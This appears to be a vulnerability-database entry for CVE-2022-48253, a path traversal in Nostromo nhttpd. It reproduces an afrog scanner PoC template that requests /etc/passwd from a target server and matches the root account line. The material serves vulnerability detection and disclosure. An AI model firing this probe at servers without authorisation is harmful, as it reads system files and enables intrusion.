CVE-2022-48253: Nostromo nhttpd path traversal

日期: 2025-08-01 | 影响软件: Nostromo nhttpd | POC: 已公开

漏洞描述

nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used.

PoC代码[已公开]

id: CVE-2022-48253

info:
  name: Nostromo nhttpd path traversal
  author: zan8in
  severity: critical
  verified: true
  description: |-
    nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-48253
  tags: cve,cve2022,nostromo,nhttpd,path-traversal,rce
  created: 2023/10/30

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |-
        GET /etc/passwd HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: '"root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)'
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-48253.yaml